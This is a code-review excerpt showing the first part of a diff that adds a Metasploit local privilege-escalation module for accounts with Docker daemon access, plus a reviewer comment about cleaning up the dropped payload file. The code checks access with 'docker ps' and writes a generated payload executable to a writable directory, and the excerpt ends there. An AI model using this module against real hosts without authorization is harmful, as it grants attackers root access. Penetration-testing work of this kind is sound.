modules/exploits/linux/local/docker_daemon_privilege_escalation.rb

```diff
@@ -0,0 +1,75 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/exploit/exe'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+  include Msf::Exploit::EXE
+  include Msf::Post::File
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'          => 'Docker Daemon Privilege Escalation',
+      'Description'   => %q{
+        This module obtains root privileges from any host account with access to the
+        Docker daemon. Usually this includes accounts in the `docker` group.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => ['forzoni'],
+      'DisclosureDate' => 'Jun 28 2016',
+      'Platform'      => 'linux',
+      'Arch'          => [ARCH_X86, ARCH_X86_64],
+      'Targets'       => [ ['Automatic', {}] ],
+      'SessionTypes'  => ['shell', 'meterpreter']
+      }
+    ))
+    register_options([
+      OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for the exploit", 60]),
+      OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
+    ], self.class)
+  end
+
+  def check
+    if cmd_exec("sh -c 'docker ps; echo $?'").strip =~ /1$/
+      print_error("Failed to access Docker daemon.")
+      Exploit::CheckCode::Safe
+    else
+      Exploit::CheckCode::Vulnerable
+    end
+  end
+
+  def exploit
+    pl = generate_payload_exe
+    exe_file = "#{datastore['WritableDir']}/#{rand_text_alpha(3 + rand(5))}.elf"
+    print_status("Writing payload executable to '#{exe_file}'")
+    write_file(exe_file, pl)
```

Comment:
The payload file should be registered for cleanup through register_file_for_cleanup() API. https://github.com/rapid7/metasploit-framework/wiki/How-to-clean-up-files-using-FileDropper